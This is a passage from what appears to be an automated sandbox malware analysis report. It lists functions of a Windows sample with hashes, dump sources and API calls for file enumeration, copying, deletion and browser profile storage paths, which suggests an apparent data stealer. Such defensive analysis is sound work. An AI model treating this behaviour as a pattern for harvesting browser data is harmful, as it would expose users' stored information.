                        • Opcode Fuzzy Hash: 105c3bcb05f093875203f813446f164b83d9064395dafdef22cee4132720a4ae
                        • Instruction Fuzzy Hash: D351E6F3E041205BF3146A2DDC4576AB7D6EB94320F1B453DEB88D7380E9399C5686C6
                        Function 008B8C6A Relevance: .2, Instructions: 206COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 809128cac2b0996c76490c686ea8b5ac6ce1b78254e6c062cc89da0c147b1486
                        • Instruction ID: d1a6063f56070a22f8d08dc4739d51c5e876a00813ff457bfa989cf74e22cbdf
                        • Opcode Fuzzy Hash: 809128cac2b0996c76490c686ea8b5ac6ce1b78254e6c062cc89da0c147b1486
                        • Instruction Fuzzy Hash: 415147F390C204AFE7147E29EC8576FBBE9EB94320F16463DEAD483744F63159118686
                        Function 007CA377 Relevance: .2, Instructions: 162COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 105948fa6a6cc30a236e48324813a0634f10b28c3569bf5076a56b1c4142f60e
                        • Instruction ID: 4e9e524f8c5619c2fce7f26a7d62665a85f199b1a2e565be391b0a5d42e3f9f0
                        • Opcode Fuzzy Hash: 105948fa6a6cc30a236e48324813a0634f10b28c3569bf5076a56b1c4142f60e
                        • Instruction Fuzzy Hash: E451C2F3A186009FE304AE2DED8577AB7D5DF94314F1A863DDBC4C3784E9395805868A
                        Function 0076F2E9 Relevance: .1, Instructions: 146COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 633782f18895734dc656f278162e5edae1c4e5c854bd2eff810c4a217204d051
                        • Instruction ID: 14b065a95fd5ae46d4fa32ca06bf18b87e5954653007d951d9dff06b2a9120fc
                        • Opcode Fuzzy Hash: 633782f18895734dc656f278162e5edae1c4e5c854bd2eff810c4a217204d051
                        • Instruction Fuzzy Hash: 604155F7A096102FF708492DECA57B6A6C9DB95320F2B463EEB45D3BC4E8780C014296
                        Function 0085A859 Relevance: .1, Instructions: 142COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04a4199a6cc069a0528d2dae77af40726403a29140296630f847b9054c186f3d
                        • Instruction ID: 6e36e0d2a3a9988ddd1e5e0420707ff979f226ac0f2ad0ef87965c482de3cf1d
                        • Opcode Fuzzy Hash: 04a4199a6cc069a0528d2dae77af40726403a29140296630f847b9054c186f3d
                        • Instruction Fuzzy Hash: C24136F3A083005FF350A969ECC4B7BB7D9EB84320F2A853DAB9493784E57858418696
                        Function 005085B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00508636
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050866D
                        • lstrcpy.KERNEL32(?,00000000), ref: 005086AA
                        • StrStrA.SHLWAPI(?,0103DF18), ref: 005086CF
                        • lstrcpyn.KERNEL32(007293D0,?,00000000), ref: 005086EE
                        • lstrlen.KERNEL32(?), ref: 00508701
                        • wsprintfA.USER32 ref: 00508711
                        • lstrcpy.KERNEL32(?,?), ref: 00508727
                        • StrStrA.SHLWAPI(?,0103E0E0), ref: 00508754
                        • lstrcpy.KERNEL32(?,007293D0), ref: 005087B4
                        • StrStrA.SHLWAPI(?,0103DFD8), ref: 005087E1
                        • lstrcpyn.KERNEL32(007293D0,?,00000000), ref: 00508800
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                        • String ID: %s%s
                        • API String ID: 2672039231-3252725368
                        • Opcode ID: e5a935fb2a75373096fcce786d31b93101cb0c8764531f6bb8e3dfe1dbe6f348
                        • Instruction ID: 63cbb4c4d19433363ed9a0a9de980e116e64fdd3ade407a6027c92c9e4baab63
                        • Opcode Fuzzy Hash: e5a935fb2a75373096fcce786d31b93101cb0c8764531f6bb8e3dfe1dbe6f348
                        • Instruction Fuzzy Hash: 68F1A271901118AFDB20DB64DD48AEE7BB9FF88300F048559FA09E7291DB74AE41CFA5
                        Function 004F1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1F9F
                        • lstrlen.KERNEL32(01038A70), ref: 004F1FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 004F1FE3
                        • lstrlen.KERNEL32(00521794), ref: 004F1FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F200E
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F2042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F204D
                        • lstrlen.KERNEL32(00521794), ref: 004F2058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2075
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F2081
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F20AC
                        • lstrlen.KERNEL32(?), ref: 004F20E4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2104
                        • lstrcat.KERNEL32(00000000,?), ref: 004F2112
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2139
                        • lstrlen.KERNEL32(00521794), ref: 004F214B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F216B
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F2177
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F219D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F21A8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F21D4
                        • lstrlen.KERNEL32(?), ref: 004F21EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F220A
                        • lstrcat.KERNEL32(00000000,?), ref: 004F2218
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2242
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F227F
                        • lstrlen.KERNEL32(0103D010), ref: 004F228D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F22B1
                        • lstrcat.KERNEL32(00000000,0103D010), ref: 004F22B9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F22F7
                        • lstrcat.KERNEL32(00000000), ref: 004F2304
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F232D
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004F2356
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2382
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F23BF
                        • DeleteFileA.KERNEL32(00000000), ref: 004F23F7
                        • FindNextFileA.KERNEL32(00000000,?), ref: 004F2444
                        • FindClose.KERNEL32(00000000), ref: 004F2453
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                        • String ID:
                        • API String ID: 2857443207-0
                        • Opcode ID: 6af3c102dd9cc51923041b8192938140d1c1eb11c488be25f413ae8c34ee9d3b
                        • Instruction ID: 3b3473fa65f195763bce07492b0353513d6b4c2e033de5d4a5f5013a467f35b2
                        • Opcode Fuzzy Hash: 6af3c102dd9cc51923041b8192938140d1c1eb11c488be25f413ae8c34ee9d3b
                        • Instruction Fuzzy Hash: 20E18F71A1121E9BCB21EF65DE85ABF77B9EF04304F04402AFA05A7251DBBCDD118B98
                        Function 00506410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506445
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506480
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005064AA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005064E1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506506
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050650E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506537
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FolderPathlstrcat
                        • String ID: \..\
                        • API String ID: 2938889746-4220915743
                        • Opcode ID: e60d0d3bd8ebbc5240173f70dbb28a0fa2465c8bddc1c1aaafa0b6ad1087145e
                        • Instruction ID: 968a8e364da907ed9a15b7c81e6fdd10c2854d2e039c2488371011ea434978f5
                        • Opcode Fuzzy Hash: e60d0d3bd8ebbc5240173f70dbb28a0fa2465c8bddc1c1aaafa0b6ad1087145e
                        • Instruction Fuzzy Hash: 5BF1A070E0120A9FDB21EF65DD49AAE7BB8BF40304F448029F905D7291DB78DD56CB98
                        Function 00504370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005043A3
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005043D6
                        • lstrcpy.KERNEL32(00000000,?), ref: 005043FE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504409
                        • lstrlen.KERNEL32(\storage\default\), ref: 00504414
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504431
                        • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0050443D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504466
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504471
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504498
                        • lstrcpy.KERNEL32(00000000,?), ref: 005044D7
                        • lstrcat.KERNEL32(00000000,?), ref: 005044DF
                        • lstrlen.KERNEL32(00521794), ref: 005044EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504507
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00504513
                        • lstrlen.KERNEL32(.metadata-v2), ref: 0050451E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050453B
                        • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00504547
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050456E
                        • lstrcpy.KERNEL32(00000000,?), ref: 005045A0
                        • GetFileAttributesA.KERNEL32(00000000), ref: 005045A7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504601
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050462A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504653
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050467B
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005046AF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                        • String ID: .metadata-v2$\storage\default\
                        • API String ID: 1033685851-762053450
                        • Opcode ID: 8715e34d853501eba18ceb88861df2d818a342bf5577f0e21a4c17d5b380c730
                        • Instruction ID: bab3ac786d3c5ce0880a712b26a5c4d4fd8741f789579155720e8440ca32ee78
                        • Opcode Fuzzy Hash: 8715e34d853501eba18ceb88861df2d818a342bf5577f0e21a4c17d5b380c730
                        • Instruction Fuzzy Hash: 4FB1A6B0A1121A9BCB31EF75DD49AAF7BB8BF00304F045029FA45D7291DB78DD528B98
                        Function 005057A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005057D5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00505804
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505835
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050585D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00505868
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505890
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005058C8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005058D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005058F8
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050592E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505956
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00505961
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505988
                        • lstrlen.KERNEL32(00521794), ref: 0050599A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005059B9
                        • lstrcat.KERNEL32(00000000,00521794), ref: 005059C5
                        • lstrlen.KERNEL32(0103CFE0), ref: 005059D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005059F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00505A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505A2C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505A58
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00505A5F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505AB7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505B2D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505B56
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505B89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505BB5
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00505BEF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505C4C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505C70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
